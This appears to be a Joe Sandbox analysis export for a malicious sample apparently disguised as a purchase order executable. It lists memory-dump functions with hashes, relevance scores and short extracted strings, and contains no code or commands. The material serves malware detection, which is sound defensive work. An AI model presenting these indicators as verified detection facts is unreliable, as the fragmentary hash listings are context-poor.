Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fc31b6ddc1f36af2f075cf5dce6271536eddddb2508b32dd3ee07d80041c31b
Instruction ID: c333a762211ec659d033e5c19fa9a0e1733a27ebdd91b5d4b5a3d80eec531979
Opcode Fuzzy Hash: 3fc31b6ddc1f36af2f075cf5dce6271536eddddb2508b32dd3ee07d80041c31b
Instruction Fuzzy Hash: 03D1F931C2075A8ECB01EBA5D990699B7B1FF95300F10D79AE5497B261EF70AEC4CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05BAFA80 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39f1d0f5c235d63f329b21469e9c504a4b730b0e5a11202c16651ae397fb1ef2
Instruction ID: fbed3691ba35c722ba91e91f9f7b98fdffe044f943b96f2f9f697c9a112a4045
Opcode Fuzzy Hash: 39f1d0f5c235d63f329b21469e9c504a4b730b0e5a11202c16651ae397fb1ef2
Instruction Fuzzy Hash: 0B513B74E142198FDB14CFAAC9805AEFBF2FF89304F24C1A9D418A7256D734A941CF61

Uniqueness

Uniqueness Score: -1.00%

Function 05BA3108 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3ab895a5ad67886ec0852ce3a1455c9594599da46bdc05a26eb4935a0caf9bf
Instruction ID: c3aa505473289756ba5c4c08da529d8d3fac7e4960ebcfcc69762ac0eaf6b807
Opcode Fuzzy Hash: c3ab895a5ad67886ec0852ce3a1455c9594599da46bdc05a26eb4935a0caf9bf
Instruction Fuzzy Hash: F24199B5E046188FEB18CF6BD9407CABBF3AFC9300F14C1AAD508AB265DB3459858F51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 109__Purchase_Order.exePID: 7532, Parent PID: 7304COMMON

Executed Functions

Function 02F0B388 Relevance: 6.6, Strings: 5, Instructions: 357COMMON

Download Yara Rule

Strings

LjNp, xrefs: 02F0B72F
0oNp, xrefs: 02F0B5C2
LjNp, xrefs: 02F0B745
PHkq, xrefs: 02F0B7B8
PHkq, xrefs: 02F0B7A7

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
API String ID: 0-1749821215
Opcode ID: 35904a7c735c581789a15d1ddd80b761cecb749897a5ff66a6a987735e6be090
Instruction ID: 65ef8a8901ed8be445ad9fc42054939e53b9b59d6c777f9964440fd88080f0bb
Opcode Fuzzy Hash: 35904a7c735c581789a15d1ddd80b761cecb749897a5ff66a6a987735e6be090
Instruction Fuzzy Hash: 50E1D775E00218CFDB14CFA9C984A9DBBB2FF48354F1580A9E919AB3A5DB30E941DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02F0C7B2 Relevance: 6.4, Strings: 5, Instructions: 191COMMON

Download Yara Rule

Strings

LjNp, xrefs: 02F0C98F
PHkq, xrefs: 02F0CA18
PHkq, xrefs: 02F0CA07
LjNp, xrefs: 02F0C9A5
0oNp, xrefs: 02F0C822

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
API String ID: 0-1749821215
Opcode ID: 046da84836dfa73207bd0b1c9af5f678b6430842ff28a304e33f482891cd871d
Instruction ID: c188df0171c864ddfe458b6a56f6f3add4c4207989f36a6037dbc0d687a126b9
Opcode Fuzzy Hash: 046da84836dfa73207bd0b1c9af5f678b6430842ff28a304e33f482891cd871d
Instruction Fuzzy Hash: 6781E474E00208CFDB14DFAAD994A9DBBF2BF88340F14C16AE509AB365DB349881DF10

Uniqueness

Uniqueness Score: -1.00%

Function 02F0CA92 Relevance: 6.4, Strings: 5, Instructions: 190COMMON

Download Yara Rule

Strings

LjNp, xrefs: 02F0CC6F
LjNp, xrefs: 02F0CC85
PHkq, xrefs: 02F0CCE7
0oNp, xrefs: 02F0CB02
PHkq, xrefs: 02F0CCF8

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
API String ID: 0-1749821215
Opcode ID: 4b9d6f446ad51be35d30c5036dd36c91ea8d362abe58ec15a9c1eee75cf7d474
Instruction ID: f446f2db38ac6ea834dbbdb41ba705eb4cb2d1024ce933d0cc55876475469b90
Opcode Fuzzy Hash: 4b9d6f446ad51be35d30c5036dd36c91ea8d362abe58ec15a9c1eee75cf7d474
Instruction Fuzzy Hash: BD81D774E01218CFDB14DFAAD984A9DBBF2BF88340F14C16AE909AB365DB349841DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02F0C1F0 Relevance: 6.4, Strings: 5, Instructions: 189COMMON

Download Yara Rule

Strings

LjNp, xrefs: 02F0C3CF
PHkq, xrefs: 02F0C458
0oNp, xrefs: 02F0C262
LjNp, xrefs: 02F0C3E5
PHkq, xrefs: 02F0C447

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
API String ID: 0-1749821215
Opcode ID: 0c1743f1f76371b9e7a6e582cb023b3bbf008a45ecd2cb73e09ba7694b889419
Instruction ID: a6c3bfa7094ef2d480d548f0e259ad3b55ea0abccb4a1e9876ae7a1cb3aa68ea
Opcode Fuzzy Hash: 0c1743f1f76371b9e7a6e582cb023b3bbf008a45ecd2cb73e09ba7694b889419
Instruction Fuzzy Hash: A181D774E00218CFDB14DFAAD984A9DBBF2BF88300F14D16AE909AB365DB349941DF54

Uniqueness

Uniqueness Score: -1.00%

Function 02F0BF10 Relevance: 6.4, Strings: 5, Instructions: 187COMMON

Download Yara Rule

Strings

0oNp, xrefs: 02F0BF82
LjNp, xrefs: 02F0C105
PHkq, xrefs: 02F0C167
PHkq, xrefs: 02F0C178
LjNp, xrefs: 02F0C0EF

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
API String ID: 0-1749821215
Opcode ID: a01a62fa70a43a845c03c30870976c349d468f347e955267644d9fe97959e4a1
Instruction ID: ab52ad9a8ecb729d61ce20fe374c89b875b26e2a8ea8461db522856c337da42d
Opcode Fuzzy Hash: a01a62fa70a43a845c03c30870976c349d468f347e955267644d9fe97959e4a1
Instruction Fuzzy Hash: 5581C574E00218CFDB14DFAAD984A9DBBF2BF88300F14D16AE509AB365DB349981DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02F0C4D0 Relevance: 6.4, Strings: 5, Instructions: 186COMMON

Download Yara Rule

Strings

PHkq, xrefs: 02F0C738
LjNp, xrefs: 02F0C6AF
LjNp, xrefs: 02F0C6C5
0oNp, xrefs: 02F0C542
PHkq, xrefs: 02F0C727

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
API String ID: 0-1749821215
Opcode ID: 286134a4fd22879bdc3927e093625979a653be713104491ba20c8df636298d18
Instruction ID: 7bec7fe6d9e6e3f1b624e2a8416a7192df8e77b642ea2881f4da9a80a07aa4ee
Opcode Fuzzy Hash: 286134a4fd22879bdc3927e093625979a653be713104491ba20c8df636298d18
Instruction Fuzzy Hash: 7781D474E00208CFDB14DFAAD984A9DBBF2BF89300F14D16AE509AB365DB349981DF10

Uniqueness

Uniqueness Score: -1.00%

Function 02F04B31 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

PHkq, xrefs: 02F04D88
LjNp, xrefs: 02F04D10
LjNp, xrefs: 02F04D26
0oNp, xrefs: 02F04BA2
PHkq, xrefs: 02F04D99

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
API String ID: 0-1749821215
Opcode ID: 892a6162c686b1ba29e279e4b56c3ecd9953e9960c6808bf36803c005c4fcf8d
Instruction ID: ba172b5f28d9d6ef77e790b2979742189f8e2b5f990424e8b0c483ab9f892dbb
Opcode Fuzzy Hash: 892a6162c686b1ba29e279e4b56c3ecd9953e9960c6808bf36803c005c4fcf8d
Instruction Fuzzy Hash: 4781C174E01218CFDB54CFAAD984A9DBBF2BF88300F14C069E909AB365DB349981DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02F0BC32 Relevance: 6.4, Strings: 5, Instructions: 184COMMON

Download Yara Rule

Strings

PHkq, xrefs: 02F0BE98
LjNp, xrefs: 02F0BE25
LjNp, xrefs: 02F0BE0F
0oNp, xrefs: 02F0BCA2
PHkq, xrefs: 02F0BE87

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
API String ID: 0-1749821215
Opcode ID: 150b6837d7b512ed1180a5a850111ed22ed781288753b2292fed621138f9355a
Instruction ID: ab4fc64c2a4985081e0d9fa1f5cbf3065935292b1f0d67db4dc72f32851545c6
Opcode Fuzzy Hash: 150b6837d7b512ed1180a5a850111ed22ed781288753b2292fed621138f9355a
Instruction Fuzzy Hash: 39819174E00218CFDB14DFAAD984A9DFBF2BF88304F149069E509AB365DB349981DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02F068E0 Relevance: 5.3, Strings: 4, Instructions: 336COMMON

Download Yara Rule

Strings

,oq, xrefs: 02F06A52
,oq, xrefs: 02F06A60
(okq, xrefs: 02F069DA
(okq, xrefs: 02F069E8

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID: (okq$(okq$,oq$,oq
API String ID: 0-2865278577
Opcode ID: 29d7c1374ba3c037f31de7d8503f62c292afcc7c5f8850e25360195672a11da9
Instruction ID: 7c7a499dd732616cad0ff7e5ec3a4e7ac3237e963af0eeace34c26bc9f87a35c
Opcode Fuzzy Hash: 29d7c1374ba3c037f31de7d8503f62c292afcc7c5f8850e25360195672a11da9
Instruction Fuzzy Hash: 83D12971E00119DFCB18CFA9C9C4AADBBBAFF88385F158065E505EB2A1D730E861DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02F0B552 Relevance: 3.9, Strings: 3, Instructions: 153COMMON

Download Yara Rule

Strings

0oNp, xrefs: 02F0B5C2
PHkq, xrefs: 02F0B7B8
PHkq, xrefs: 02F0B7A7

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID: 0oNp$PHkq$PHkq
API String ID: 0-3540209698
Opcode ID: e581383f26a105ba1bf8500e140a01efb1bcc785b31715420476032e1751a55f
Instruction ID: c5da4562067dd3f0b86d0feb3937c72a05bf81ea91a807e7c9a279b5278fde4c
Opcode Fuzzy Hash: e581383f26a105ba1bf8500e140a01efb1bcc785b31715420476032e1751a55f
Instruction Fuzzy Hash: C761B475E002089FDB14DFAAD984A9EBBF2FF88304F24D069E505AB365DB349941DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02F098B8 Relevance: 3.4, Strings: 2, Instructions: 854COMMON

Download Yara Rule

Strings

4'kq, xrefs: 02F0A2D3
(okq, xrefs: 02F09CD8

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID: (okq$4'kq
API String ID: 0-1210385896
Opcode ID: e192c4e801fa76cf813f885a5a036fcad17560068adfd7e3f5111d2c9843a187
Instruction ID: f78c00e59546b020b411a5e1a78a77d6b83926e1807a647e3b74879b94d0e828
Opcode Fuzzy Hash: e192c4e801fa76cf813f885a5a036fcad17560068adfd7e3f5111d2c9843a187
Instruction Fuzzy Hash: 1E72AF71A00209DFCB15CFA8C984AAEBBF2FF88340F158569EA059B3A5D771ED41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02F06168 Relevance: 3.0, Strings: 2, Instructions: 511COMMON

Download Yara Rule

Strings

Hoq, xrefs: 02F0656E
(okq, xrefs: 02F066A2

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID: (okq$Hoq
API String ID: 0-4134915641
Opcode ID: 28dd1af816f317fe79d631ae2e5d0f4d167274d406e6e158c285910596198ec2
Instruction ID: 98cc7e07b605b4d9bbc61d6fce9328505e174b984522cea9023b116772cf7ff8
Opcode Fuzzy Hash: 28dd1af816f317fe79d631ae2e5d0f4d167274d406e6e158c285910596198ec2
Instruction Fuzzy Hash: C1128B70A002198FCB14DF69C994AAEBBFABF88344F108169E605EB395DF34DD41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02F035CA Relevance: 2.9, Strings: 2, Instructions: 423COMMON

Download Yara Rule

Strings

Xoq, xrefs: 02F03607
$kq, xrefs: 02F035EE

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID: Xoq$$kq
API String ID: 0-227003152
Opcode ID: 05dd8e8922756cc62f73b6a962931efeb80353813b8840c63eee59ff80cbb70c
Instruction ID: e447279ab3fe3da7254c46358bcda0fe637e6b1f1ac4d7cdf9774af0a2754b4f
Opcode Fuzzy Hash: 05dd8e8922756cc62f73b6a962931efeb80353813b8840c63eee59ff80cbb70c
Instruction Fuzzy Hash: 38F15E75F00208CFCB18DFB9D9949AEBBB6BF88350B14846DE506A7398CE349842DB55

Uniqueness

Uniqueness Score: -1.00%

Function 02F0EDF0 Relevance: .7, Instructions: 716COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6852795caa6e723667e01992fa6a485b21e9d9cd05d6383114e09824276cf982
Instruction ID: ef6605c713265632bd7a809636b8e1d6f995f14d40129da6afcefd7a4b276c7a
Opcode Fuzzy Hash: 6852795caa6e723667e01992fa6a485b21e9d9cd05d6383114e09824276cf982
Instruction Fuzzy Hash: 8172E074E012298FDB64CF69C980BDDBBB2BB49340F1491E9E509A7395DB34AE81DF40

Uniqueness

Uniqueness Score: -1.00%

Function 02F0FA10 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81befb4e77331b8e6db7013196ce06be5e0600d1a4bb080b2fed9ba8588bfacb
Instruction ID: b9351aaddf3d40142f25773d3a5c6df98f19871a47f1c4a78a5ca925b8292312
Opcode Fuzzy Hash: 81befb4e77331b8e6db7013196ce06be5e0600d1a4bb080b2fed9ba8588bfacb
Instruction Fuzzy Hash: A3D1AD74E00218CFDB14DFA5D985B9DBBB2FF89300F1481AAD809AB355DB399A85DF10

Uniqueness

Uniqueness Score: -1.00%

Function 02F06EB8 Relevance: 10.5, Strings: 8, Instructions: 475COMMON

Download Yara Rule

Strings

(okq, xrefs: 02F06FB1
(okq, xrefs: 02F0707A
(okq, xrefs: 02F073C7
(okq, xrefs: 02F06EF6
(okq, xrefs: 02F06FDD
,oq, xrefs: 02F07358
,oq, xrefs: 02F07368
(okq, xrefs: 02F073D7

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID: (okq$(okq$(okq$(okq$(okq$(okq$,oq$,oq
API String ID: 0-2636989756
Opcode ID: 938ac89806f4b1a5640f0e09130d54eea771bf54eba97d0eaa6cd31cd6b4d512
Instruction ID: 1eee0c1a76a053a338c3a5f97f4b6fb891465374073e03caff42fdc78bda31b1
Opcode Fuzzy Hash: 938ac89806f4b1a5640f0e09130d54eea771bf54eba97d0eaa6cd31cd6b4d512
Instruction Fuzzy Hash: B5124830A00249CFCB25DF69D984A9EFBF2BF48354F148599E9099B2A1DB31FD41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02F07850 Relevance: 3.2, Strings: 2, Instructions: 690COMMON

Download Yara Rule

Strings

$kq, xrefs: 02F08374
$kq, xrefs: 02F08397

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID: $kq$$kq
API String ID: 0-3550614674
Opcode ID: 2afe70bc3436dc036738d96a9039fb429e6dc332e4f58e9292f62fa00cf6282f
Instruction ID: 3e2c839cc65b3db941d1eaf149c78594aeda6eecf17c1cc8faa5734998d03b68
Opcode Fuzzy Hash: 2afe70bc3436dc036738d96a9039fb429e6dc332e4f58e9292f62fa00cf6282f
Instruction Fuzzy Hash: 1B522074A00218CFEB549BA4C8A0B9EBB73FB94340F1091ADC50A6B3A5CF359D85DF55

Uniqueness

Uniqueness Score: -1.00%

Function 02F08849 Relevance: 2.8, Strings: 2, Instructions: 328COMMON

Download Yara Rule

Strings

4'kq, xrefs: 02F08871
4'kq, xrefs: 02F08897

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID: 4'kq$4'kq
API String ID: 0-4171853269
Opcode ID: e9ff18807fb81976d1d98975ec5248698ab389abb58c6da62cc80666e8f8240e
Instruction ID: 12907bd934be1f11b7fd1e3aa213da31809d0c55a74382752f46f8b44ceb934c
Opcode Fuzzy Hash: e9ff18807fb81976d1d98975ec5248698ab389abb58c6da62cc80666e8f8240e
Instruction Fuzzy Hash: 92B161717016118FDB195E29C9E8B3936AAEF857C4F144066E602CF3F1EB29DC42EB45

Uniqueness

Uniqueness Score: -1.00%

Function 02F05700 Relevance: 2.8, Strings: 2, Instructions: 323COMMON

Download Yara Rule

Strings

Hoq, xrefs: 02F0581E
Hoq, xrefs: 02F057EB

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID: Hoq$Hoq
API String ID: 0-3106737575
Opcode ID: e8ed1bbd8882178d230ea32efb5b092fb1e12a59aaf03ce36f1201e5d6466a0c
Instruction ID: 7ad2fcc15890b11d217801cc75b09b46e28f6dfd6cefb189f0ece3cc51f179f7
Opcode Fuzzy Hash: e8ed1bbd8882178d230ea32efb5b092fb1e12a59aaf03ce36f1201e5d6466a0c
Instruction Fuzzy Hash: 76B1A0317042148FDB259F79C898B2A7BE6BB88394F544429EA06CB3D1DFB4DC05EB91

Uniqueness

Uniqueness Score: -1.00%

Function 02F05C60 Relevance: 2.7, Strings: 2, Instructions: 230COMMON

Download Yara Rule

Strings

,oq, xrefs: 02F05D36
,oq, xrefs: 02F05D40

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID: ,oq$,oq
API String ID: 0-3825397795
Opcode ID: 170b86345c9c6dc98b01907758d9057dbcb9a8c0d58413d045295b2fad38dc11
Instruction ID: 93414ee288130341f2c87efb9e2389f6c130f0c66da6b0e79e6313b13baee1f9
Opcode Fuzzy Hash: 170b86345c9c6dc98b01907758d9057dbcb9a8c0d58413d045295b2fad38dc11
Instruction Fuzzy Hash: 9F819035B04105CFCB14CF69C8C8A6AB7B2FF88294B95806AD606DB3A5DB71EC41DF90

Uniqueness

Uniqueness Score: -1.00%

Function 02F03480 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

Xoq, xrefs: 02F0348D
Xoq, xrefs: 02F034B6

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID: Xoq$Xoq
API String ID: 0-251439590
Opcode ID: ff24c0e9ad96453c6add4396aa664bcff97290978b3f4236bdf6a354c39b29c1
Instruction ID: bf4fb1e70d13dd2ddfa873f1892122299d50ff8656ce947678fc9a796b61f5be
Opcode Fuzzy Hash: ff24c0e9ad96453c6add4396aa664bcff97290978b3f4236bdf6a354c39b29c1
Instruction Fuzzy Hash: 4231FD36F003258BDF194A6956D437EA6DAABC4290F18407DDA06D73D4DF74CC44E791

Uniqueness

Uniqueness Score: -1.00%

Function 02F00C8F Relevance: 1.7, Strings: 1, Instructions: 418COMMON

Download Yara Rule

Strings

LRkq, xrefs: 02F00E80

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID: LRkq
API String ID: 0-1052062081
Opcode ID: 0c3fdefc918fc5fd16812efc80eed0376f54568ac895868355154b54a413b69b
Instruction ID: f4983e333a02bd3d031ea31673e983ece436aaa81c881efcfdb18430d88cfbd1
Opcode Fuzzy Hash: 0c3fdefc918fc5fd16812efc80eed0376f54568ac895868355154b54a413b69b
Instruction Fuzzy Hash: 3822B874A00219CFCB54DF68EA94A9DBBB2FF88314F1085B9E849A7354DB386D85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 02F00CA0 Relevance: 1.7, Strings: 1, Instructions: 410COMMON

Download Yara Rule

Strings

LRkq, xrefs: 02F00E80

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID: LRkq
API String ID: 0-1052062081
Opcode ID: fc844fb680b622bebf8caa5703dd353bc15a20cbdd51b2ac3868d1511c13e822
Instruction ID: 9cfcf8f6fa6fa7845923788f825131193d8e7b0825378d766426ea66afc834b9
Opcode Fuzzy Hash: fc844fb680b622bebf8caa5703dd353bc15a20cbdd51b2ac3868d1511c13e822
Instruction Fuzzy Hash: 6722B874A00219CFCB54DF64EA94A9DBBB2FF88314F1085B9E849A7354DB386D85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 02F0A6B0 Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

(okq, xrefs: 02F0A839

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID: (okq
API String ID: 0-2789353238
Opcode ID: 48fb9e7c613f6c319f896704b297263edcead37a89bbdb9e431aa98ade7d74e0
Instruction ID: be7f3e661f35fe36d725b8a98c37e90e826a1ac89353ba83a53aaf584468018f
Opcode Fuzzy Hash: 48fb9e7c613f6c319f896704b297263edcead37a89bbdb9e431aa98ade7d74e0
Instruction Fuzzy Hash: AB41D236B002148FCB099F78D9546AE7BF7BFC8251F14816AE606EB391DE319C05D794

Uniqueness

Uniqueness Score: -1.00%

Function 02F0A878 Relevance: .4, Instructions: 410COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03bae770d4572b30eeb1a386c68321e776632125d6434778d1e8ce265c79fd25
Instruction ID: 84f8fb1e979d2743cc0b7ae186727c4675a0929b19ffed9bc49eb251413ee77c
Opcode Fuzzy Hash: 03bae770d4572b30eeb1a386c68321e776632125d6434778d1e8ce265c79fd25
Instruction Fuzzy Hash: 90F11B71E00615CFCB05CFA9C5C8AADBBF6BF88354B168059E615AB3A1CB35EC81DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02F07498 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80649725ebf535811f6a60df1b908c97bfba82a10ba7c8edf375ad15cb5c52c7
Instruction ID: fd07b6129decca2ed8e5ea266f38340523c8259d03c3ff00acfdcb934f72d6f6
Opcode Fuzzy Hash: 80649725ebf535811f6a60df1b908c97bfba82a10ba7c8edf375ad15cb5c52c7
Instruction Fuzzy Hash: 2F711E35B002058FCB15EF68C894AADBBEAAF49294F1544D5EA06CB3B1DB71EC41DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02F0E087 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb62907add4b8eb330e3258367bac172f497f49ba30224abc5810826dc5d11b1
Instruction ID: 0554f24ebc63765cd95c1ccb897ae7f010aeab8c69bbaa007c6ab88c82d72afe
Opcode Fuzzy Hash: cb62907add4b8eb330e3258367bac172f497f49ba30224abc5810826dc5d11b1
Instruction Fuzzy Hash: 45715470D01319CFDB15DFA4D994AADBBB2FF89300F20452AD805AB3A9DB359985CF00

Uniqueness

Uniqueness Score: -1.00%

Function 02F0D3C2 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

